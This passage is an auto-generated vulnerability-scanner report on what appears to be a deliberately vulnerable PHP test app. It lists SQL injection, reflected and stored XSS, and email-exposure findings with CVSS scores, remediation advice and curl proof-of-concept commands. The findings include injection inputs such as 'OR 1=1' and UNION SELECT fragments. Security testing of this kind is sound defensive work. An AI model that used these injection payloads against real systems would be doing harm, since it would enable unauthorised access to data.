PCI-DSS v4.0 Req 6.2.4 (injection/XSS) · ISO/IEC 27001:2022 A.8.28 · GDPR Art. 32 (security of processing)
MITRE ATT&CK
T1190 Exploit Public-Facing Application
Initial Access
Certainty / Access
Confirmed · 🔓 Unauthenticated
Confidence & Evidence
75%Medium confidenceEvidence score 75/100
- +50 Confirmed (strong signal)
- +20 Direct detection (crawl-sqli-post)
- +5 Stable 2xx response
Proof of Concept
Reproduce:
curl -i -X POST 'ggsec_test_app.php?page=sqli_second_order' --data 'crawl-sqli-post'
Evidence (live response):
[CRAWL] POST form field 'email' surfaced a SQL error for a single-quote payload. <p>User registered! ID: 71</p><p>Related posts query: SELECT * FROM posts WHERE title LIKE '%'|' UNION SELECT 1,2,3,4,5-- -|%' UNION SELECT 1,2,3,4,5-- -|' UNION SELECT usern…
Remediation
Use parameterized queries / prepared statements — never build queries by string concatenation.
- Replace interpolated SQL with bound parameters (PDO/mysqli prepared statements, '?'/named placeholders).
- For NoSQL, cast user input to the expected scalar type and reject array/operator inputs ((string)$x, type checks).
- Apply least-privilege DB credentials; the web user should not own DDL or admin rights.
- Add allowlist validation for structural elements that cannot be parameterized (column/table names, ORDER BY).
Refs: CWE-89 · OWASP: SQL Injection Prevention Cheat Sheet · CWE-943 (NoSQL)
| Result | Method | URL | Payload | Status | Time | Detection | DB |
| ⚠ VULN |
POST |
ggsec_test_app.php?page=sqli_second_order |
crawl-sqli-post |
200 |
0ms |
crawl-sqli-post |
— |
🔍
GGC-VULN-B8F
0.0
NONE
P3
Confirmed
PII_EXPOSURE
Email address
HTTP response body
1/1 hits
▼
Flow
The application returns Email address in a response body; sensitive personal data / credentials are exposed to the client (and any intermediary).
CWE / CVSS
CWE-359 Exposure of Private Personal Information ·
CVSS 0.0 NonePersonal data is exposed in responses without need or access control (privacy / GDPR concern).
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
ⓘ No security impact (e.g. neutralised by a cast/guard, or informational) — reported for awareness, not scored.
Compliance Impact
A02:2021 – Cryptographic Failures
PCI-DSS v4.0 Req 3.4.1 / 3.5.1 · ISO/IEC 27001:2022 A.5.34 / A.8.24 · GDPR Art. 5(1)(f) + Art. 32 + Art. 34 (breach notification)
MITRE ATT&CK
T1213 Data from Information Repositories
Collection
Certainty / Access
Confirmed · 🔓 Unauthenticated
Confidence & Evidence
75%Medium confidenceEvidence score 75/100
- +50 Confirmed (strong signal)
- +20 Direct detection (pii-email)
- +5 Stable 2xx response
Proof of Concept
Reproduce:
curl -i 'ggsec_test_app.php?page=sqli_first_order&id=1%20OR%201%3D1'
Evidence (live response):
Exposed Email address in a response body — 1 occurrence(s). Masked sample: a***@ggsec.local. First seen: ggsec_test_app.php?page=sqli_first_order&id=1%20OR%201%3D1. Personal data / secrets should not be returned to unauthorised contexts (GDPR/RODO Art. 32).
Remediation
Stop returning personal data / secrets in responses; minimise, mask, and access-control sensitive fields.
- Remove secrets (keys/tokens/private keys) from responses entirely; rotate any that leaked.
- Return only the fields the client needs (data minimisation); mask IDs/cards (e.g. last 4) server-side.
- Gate personal data behind authorization and send Cache-Control: no-store on those responses.
- Map this to GDPR/RODO Art. 5 (minimisation) & Art. 32 (security of processing); log/justify any PII egress.
Refs: CWE-359 · OWASP: Sensitive Data Exposure · GDPR/RODO Art. 32
| Result | Method | URL | Payload | Status | Time | Detection | DB |
| ⚠ VULN |
GET |
ggsec_test_app.php?page=sqli_first_order&id=1%20OR%201%3D1 |
pii-email |
200 |
0ms |
pii-email |
— |
🗃
GGC-SQLI-845
8.2
HIGH
P1
Confirmed
SQL_QUERY
id
crawl: /ggsec_test_app.php?page=sqli_first_order&id=1
1/1 hits
▼
Flow
A crawler-discovered param-bearing endpoint (not in the SAST plan) returns a SQL error when a quote is injected.
CWE / CVSS
CWE-89 SQL Injection (SQLite backend) ·
CVSS 8.2 HighSQL is built from untrusted input, letting an attacker alter the query to read/modify data or bypass authentication.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:H/RC:C
ⓘ SQLite backend — impact bounded to DB read / limited write (no stacked queries, xp_cmdshell, LOAD_FILE, or host/network pivot).
Compliance Impact
A03:2021 – Injection
PCI-DSS v4.0 Req 6.2.4 (injection/XSS) · ISO/IEC 27001:2022 A.8.28 · GDPR Art. 32 (security of processing)
MITRE ATT&CK
T1190 Exploit Public-Facing Application
Initial Access
Certainty / Access
Confirmed · 🔓 Unauthenticated
Confidence & Evidence
90%High confidenceEvidence score 90/100
- +50 Confirmed (strong signal)
- +20 Direct detection (crawl-sqli)
- +15 Damning token in response ("SQLSTATE")
- +5 Stable 2xx response
Proof of Concept
Reproduce:
curl -i '/ggsec_test_app.php?page=sqli_first_order&id=1'
Reflection @ offset 195 — via crawl-sqli:
…FROM users WHERE id = '</p><p style='color:red'>Error: SQLSTATE[HY000]: General error: 1 unrecognized token: "'"</p>
Evidence (live response):
[CRAWL] param 'id' on a spider-discovered URL surfaced a SQL error for a single-quote payload. <h2>User Profile</h2><p>Query: SELECT * FROM users WHERE id = '</p><p style='color:red'>Error: SQLSTATE[HY000]: General error: 1 unrecognized token: "'"</p>
Remediation
Use parameterized queries / prepared statements — never build queries by string concatenation.
- Replace interpolated SQL with bound parameters (PDO/mysqli prepared statements, '?'/named placeholders).
- For NoSQL, cast user input to the expected scalar type and reject array/operator inputs ((string)$x, type checks).
- Apply least-privilege DB credentials; the web user should not own DDL or admin rights.
- Add allowlist validation for structural elements that cannot be parameterized (column/table names, ORDER BY).
Refs: CWE-89 · OWASP: SQL Injection Prevention Cheat Sheet · CWE-943 (NoSQL)
| Result | Method | URL | Payload | Status | Time | Detection | DB |
| ⚠ VULN |
GET |
/ggsec_test_app.php?page=sqli_first_order&id=1 |
crawl-sqli |
200 |
0ms |
crawl-sqli |
— |
⚡
GGC-XSS-2E9
5.4
MEDIUM
P2
Confirmed
XSS
search
crawl: /ggsec_test_app.php?page=xss_reflected&search=test
1/1 hits
▼
Flow
A crawler-discovered param-bearing endpoint (not in the SAST plan) reflects the parameter into HTML without encoding.
Impact
SESSION_THEFT — Direct
CWE / CVSS
CWE-79 Cross-site Scripting ·
CVSS 5.4 Medium (Base 6.1 Medium)Untrusted input is reflected into a page without encoding, so attacker script runs in the victim's browser (session theft).
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N/E:H/RC:C
ⓘ Base 6,1 → Effective 5,4 — auth-gated (PR:L).
Compliance Impact
A03:2021 – Injection
PCI-DSS v4.0 Req 6.2.4 (injection/XSS) · ISO/IEC 27001:2022 A.8.28 · GDPR Art. 32 (security of processing)
MITRE ATT&CK
T1059.007 Command and Scripting Interpreter: JavaScript · T1185 Browser Session Hijacking
Execution, Collection
Certainty / Access
Confirmed · 👤 Customer
Confidence & Evidence
75%Medium confidenceEvidence score 75/100
- +50 Confirmed (strong signal)
- +20 Direct detection (crawl-xss)
- +5 Stable 2xx response
Proof of Concept
Reproduce:
curl -i '/ggsec_test_app.php?page=xss_reflected&search=test'
Evidence (live response):
…for: <b>ggsecXSS7</b></p><input type='hidden' name='q' value='<b>ggsecXSS7</b>'><script>var lastSearch = '<b>ggsecXSS7</b>';</script>
Remediation
Apply context-aware output encoding on every place user data reaches HTML/JS, and add a CSP.
- Encode on output by context: HTML body (htmlspecialchars/escapeHTML), attributes, JS, URL.
- Prefer auto-escaping template engines; avoid raw echo/print of tainted data.
- Deploy a strict Content-Security-Policy and set HttpOnly on session cookies.
Refs: CWE-79 · OWASP: XSS Prevention Cheat Sheet
| Result | Method | URL | Payload | Status | Time | Detection | DB |
| ⚠ VULN |
GET |
/ggsec_test_app.php?page=xss_reflected&search=test |
crawl-xss |
200 |
0ms |
crawl-xss |
— |
⚡
GGC-XSS-DEB
5.4
MEDIUM
P2
Confirmed
XSS
title
ggsec_test_app.php?page=ssti&render=346
1/1 hits
▼
Flow
Second-order stored XSS: user-controlled 'title' is written to storage and later echoed into HTML without output encoding on the render path (CWE-79).
Impact
SESSION_THEFT — Direct
CWE / CVSS
CWE-79 Cross-site Scripting ·
CVSS 5.4 Medium (Base 6.1 Medium)Untrusted input is reflected into a page without encoding, so attacker script runs in the victim's browser (session theft).
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N/E:H/RC:C
ⓘ Base 6,1 → Effective 5,4 — auth-gated (PR:L).
Compliance Impact
A03:2021 – Injection
PCI-DSS v4.0 Req 6.2.4 (injection/XSS) · ISO/IEC 27001:2022 A.8.28 · GDPR Art. 32 (security of processing)
MITRE ATT&CK
T1059.007 Command and Scripting Interpreter: JavaScript · T1185 Browser Session Hijacking
Execution, Collection
Certainty / Access
Confirmed · 👤 Customer
Confidence & Evidence
75%Medium confidenceEvidence score 75/100
- +50 Confirmed (strong signal)
- +20 Direct detection (stored-xss-2nd-order)
- +5 Stable 2xx response
Proof of Concept
Reproduce:
curl -i 'ggsec_test_app.php?page=ssti&render=346'
Evidence (live response):
Stored XSS: a 'title' submitted to the store endpoint was rendered UNESCAPED (<b>ggsecSTORED7</b>) in the render response ggsec_test_app.php?page=ssti&render=346 — persisted, so it fires for every viewer of that page.
Remediation
Apply context-aware output encoding on every place user data reaches HTML/JS, and add a CSP.
- Encode on output by context: HTML body (htmlspecialchars/escapeHTML), attributes, JS, URL.
- Prefer auto-escaping template engines; avoid raw echo/print of tainted data.
- Deploy a strict Content-Security-Policy and set HttpOnly on session cookies.
Refs: CWE-79 · OWASP: XSS Prevention Cheat Sheet
| Result | Method | URL | Payload | Status | Time | Detection | DB |
| ⚠ VULN |
GET |
ggsec_test_app.php?page=ssti&render=346 |
stored-xss-2nd-order |
200 |
0ms |
stored-xss-2nd-order |
— |
⚡
GGC-XSS-F5F
5.4
MEDIUM
P2
Confirmed
XSS
title
ggsec_test_app.php?page=ssti&render=347
1/1 hits
▼
Flow
Second-order stored XSS: user-controlled 'title' is written to storage and later echoed into HTML without output encoding on the render path (CWE-79).
Impact
SESSION_THEFT — Direct
CWE / CVSS
CWE-79 Cross-site Scripting ·
CVSS 5.4 Medium (Base 6.1 Medium)Untrusted input is reflected into a page without encoding, so attacker script runs in the victim's browser (session theft).
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N/E:H/RC:C
ⓘ Base 6,1 → Effective 5,4 — auth-gated (PR:L).
Compliance Impact
A03:2021 – Injection
PCI-DSS v4.0 Req 6.2.4 (injection/XSS) · ISO/IEC 27001:2022 A.8.28 · GDPR Art. 32 (security of processing)
MITRE ATT&CK
T1059.007 Command and Scripting Interpreter: JavaScript · T1185 Browser Session Hijacking
Execution, Collection
Certainty / Access
Confirmed · 👤 Customer
Confidence & Evidence
75%Medium confidenceEvidence score 75/100
- +50 Confirmed (strong signal)
- +20 Direct detection (stored-xss-2nd-order)
- +5 Stable 2xx response
Proof of Concept
Reproduce:
curl -i 'ggsec_test_app.php?page=ssti&render=347'
Evidence (live response):
Stored XSS: a 'title' submitted to the store endpoint was rendered UNESCAPED (<b>ggsecSTORED7</b>) in the render response ggsec_test_app.php?page=ssti&render=347 — persisted, so it fires for every viewer of that page.
Remediation
Apply context-aware output encoding on every place user data reaches HTML/JS, and add a CSP.
- Encode on output by context: HTML body (htmlspecialchars/escapeHTML), attributes, JS, URL.
- Prefer auto-escaping template engines; avoid raw echo/print of tainted data.
- Deploy a strict Content-Security-Policy and set HttpOnly on session cookies.
Refs: CWE-79 · OWASP: XSS Prevention Cheat Sheet
| Result | Method | URL | Payload | Status | Time | Detection | DB |
| ⚠ VULN |
GET |
ggsec_test_app.php?page=ssti&render=347 |
stored-xss-2nd-order |
200 |
0ms |
stored-xss-2nd-order |
— |
⚡
GGC-XSS-17E
5.4
MEDIUM
P2
Confirmed
XSS
title
ggsec_test_app.php?page=ssti&render=348
1/1 hits
▼
Flow
Second-order stored XSS: user-controlled 'title' is written to storage and later echoed into HTML without output encoding on the render path (CWE-79).
Impact
SESSION_THEFT — Direct
CWE / CVSS
CWE-79 Cross-site Scripting ·
CVSS 5.4 Medium (Base 6.1 Medium)Untrusted input is reflected into a page without encoding, so attacker script runs in the victim's browser (session theft).
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N/E:H/RC:C
ⓘ Base 6,1 → Effective 5,4 — auth-gated (PR:L).
Compliance Impact
A03:2021 – Injection
PCI-DSS v4.0 Req 6.2.4 (injection/XSS) · ISO/IEC 27001:2022 A.8.28 · GDPR Art. 32 (security of processing)
MITRE ATT&CK
T1059.007 Command and Scripting Interpreter: JavaScript · T1185 Browser Session Hijacking
Execution, Collection
Certainty / Access
Confirmed · 👤 Customer
Confidence & Evidence
75%Medium confidenceEvidence score 75/100
- +50 Confirmed (strong signal)
- +20 Direct detection (stored-xss-2nd-order)
- +5 Stable 2xx response
Proof of Concept
Reproduce:
curl -i 'ggsec_test_app.php?page=ssti&render=348'
Evidence (live response):
Stored XSS: a 'title' submitted to the store endpoint was rendered UNESCAPED (<b>ggsecSTORED7</b>) in the render response ggsec_test_app.php?page=ssti&render=348 — persisted, so it fires for every viewer of that page.
Remediation
Apply context-aware output encoding on every place user data reaches HTML/JS, and add a CSP.
- Encode on output by context: HTML body (htmlspecialchars/escapeHTML), attributes, JS, URL.
- Prefer auto-escaping template engines; avoid raw echo/print of tainted data.
- Deploy a strict Content-Security-Policy and set HttpOnly on session cookies.
Refs: CWE-79 · OWASP: XSS Prevention Cheat Sheet
| Result | Method | URL | Payload | Status | Time | Detection | DB |
| ⚠ VULN |
GET |
ggsec_test_app.php?page=ssti&render=348 |
stored-xss-2nd-order |
200 |
0ms |
stored-xss-2nd-order |
— |
🗃
GGC-SQLI-620
8.2
HIGH
P1
Confirmed
SQL_QUERY
username
crawl-form: ggsec_test_app.php?page=sqli_second_order
1/1 hits
▼
Flow
A crawler-discovered POST form (not in the SAST plan) returns a SQL error when a quote is injected into a field.
CWE / CVSS
CWE-89 SQL Injection (SQLite backend) ·
CVSS 8.2 HighSQL is built from untrusted input, letting an attacker alter the query to read/modify data or bypass authentication.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:H/RC:C
ⓘ SQLite backend — impact bounded to DB read / limited write (no stacked queries, xp_cmdshell, LOAD_FILE, or host/network pivot).
Compliance Impact
A03:2021 – Injection
PCI-DSS v4.0 Req 6.2.4 (injection/XSS) · ISO/IEC 27001:2022 A.8.28 · GDPR Art. 32 (security of processing)
MITRE ATT&CK
T1190 Exploit Public-Facing Application
Initial Access
Certainty / Access
Confirmed · 🔓 Unauthenticated
Confidence & Evidence
75%Medium confidenceEvidence score 75/100
- +50 Confirmed (strong signal)
- +20 Direct detection (crawl-sqli-post)
- +5 Stable 2xx response
Proof of Concept
Reproduce:
curl -i -X POST 'ggsec_test_app.php?page=sqli_second_order' --data 'crawl-sqli-post'
Evidence (live response):
[CRAWL] POST form field 'username' surfaced a SQL error for a single-quote payload. <p>User registered! ID: 69</p><p>Related posts query: SELECT * FROM posts WHERE title LIKE '%'|' UNION SELECT 1,2,3,4,5-- -|%' UNION SELECT 1,2,3,4,5-- -|' UNION SELECT us…
Remediation
Use parameterized queries / prepared statements — never build queries by string concatenation.
- Replace interpolated SQL with bound parameters (PDO/mysqli prepared statements, '?'/named placeholders).
- For NoSQL, cast user input to the expected scalar type and reject array/operator inputs ((string)$x, type checks).
- Apply least-privilege DB credentials; the web user should not own DDL or admin rights.
- Add allowlist validation for structural elements that cannot be parameterized (column/table names, ORDER BY).
Refs: CWE-89 · OWASP: SQL Injection Prevention Cheat Sheet · CWE-943 (NoSQL)
| Result | Method | URL | Payload | Status | Time | Detection | DB |
| ⚠ VULN |
POST |
ggsec_test_app.php?page=sqli_second_order |
crawl-sqli-post |
200 |
0ms |
crawl-sqli-post |
— |